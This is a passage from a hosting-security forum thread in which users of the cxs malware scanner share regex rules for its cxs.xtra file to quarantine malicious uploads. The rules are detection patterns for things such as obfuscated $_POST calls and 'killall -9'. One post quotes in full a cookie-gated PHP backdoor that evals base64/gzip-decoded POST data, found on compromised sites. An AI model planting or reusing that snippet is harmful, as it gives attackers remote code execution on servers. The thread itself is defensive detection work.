STICKY rules for CXS.XTRA regs.

Community forum to discuss cxs.
If you believe that there is a problem with your cxs installation and want support then, as a paid product, you should use the helpdesk after having consulted the documentation.
68 posts Page 6 of 7
mobileappsgallery
Junior Member
Posts: 1
Joined: 25 Jun 2012, 12:46


Don't work regall:yahoo\.Com:68\.142\.202\.247
Sergio
Junior Member
Posts: 1366
Joined: 12 Dec 2006, 14:56


mobileappsgallery wrote:
Don't work regall:yahoo\.Com:68\.142\.202\.247
I have tried and it is working:
Quarantine date:Mon Jun 25 08:37:51 2012
Quarantine file: /quarantine/ftp/owner/cxstest.php.1340631471_1
Quarantine file size: 67 bytes
Original file: /home/owner/public_html/cxstest.php
File owner: owner
FTP Account: owner
FTP IP address: xx.xx.xx.xx
md5sum: 4163ca7b518066623fe073cfd52650b4
Reason:
Regular expression match = [yahoo\.com\:68\.142\.202\.247]
Regular expression match = [yahoo\.Com:68\.142\.202\.247]
As you can see, I have tried with two rules and both worked.

Sergio
peterelsner
Junior Member
Posts: 73
Joined: 16 Nov 2010, 22:49


So, is no one updating this sticky list anymore???

It's been 6 months since the last update, and I know more strings exist that could be inserted here.
Sergio
Junior Member
Posts: 1366
Joined: 12 Dec 2006, 14:56


Hello Peterelsner,
if you can contribute, I am more than glad to add any string that you can provide.

I have not posted anymore because by now my servers have not got any attacks with different rules to the ones that I have or the ones that CXS includes.

If you can help, it will be great.

Regards,

Sergio
peterelsner
Junior Member
Posts: 73
Joined: 16 Nov 2010, 22:49


Found a new one that you may want to add. Over the weekend had no less than 150 messages that various gif/jpg/php files were uploaded that had suspicious data in it. They were marked as suspicious only and not quarantined.

Added this to my cxs.xtra file:

regall:quarantine:\$_POST\[\(chr\(112\)\.chr\(49\)\)

Then ran scan on those 4 or 5 users that had the most hits...

result was:

w1655179n.php.1369756806_1) Regular expression match = [\$_POST\[\(chr\(112\)\.chr\(49\)\)] (md5sum:254e27d2d8854a6bc9f9a760f4c52a15)

(dozens of others too). But now they got quarantined.
Sergio
Junior Member
Posts: 1366
Joined: 12 Dec 2006, 14:56


Thank you, Peter.

I am adding this to the sticky.

Regards,

Sergio
qchost
Junior Member
Posts: 1
Joined: 27 Jan 2014, 09:01


Another one that came up last night:
Code: Select all
regall:quarantine:second stage dropper
regall:quarantine:killall -9
Sergio
Junior Member
Posts: 1366
Joined: 12 Dec 2006, 14:56


Thank you, qchost, I have added these to the sticky.

Regards,

Sergio
dieter
Junior Member
Posts: 11
Joined: 18 Mar 2011, 05:36


Hi all,

Could somebody please help me create a regex for this. I have found it in a couple of sites, and they use it to alter .js files.

if(!empty($_COOKIE['__utma']) and substr($_COOKIE['__utma'],0,16)=='3469825000034634'){if (!empty($_POST['msg']) and $msg=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['msg']))))){echo '<textarea id=areatext>';eval($msg);echo '</textarea>bg';exit;}} exit;

Regards,

Dieter
Sergio
Junior Member
Posts: 1366
Joined: 12 Dec 2006, 14:56


The sticky is only for regex that CXS users donate to the forum and not to ask for the creation of one, for this only time, I am generating a regex for you, but please if you need help open a new thread asking for it.
Code: Select all
regall:quaratine:\$msg\=@gzinflate\(@base64_decode\(@str_replace
On the other hand, please read thread viewtopic.php?f=26&t=7341#p21404 that is about .JS files.
68 posts Page 6 of 7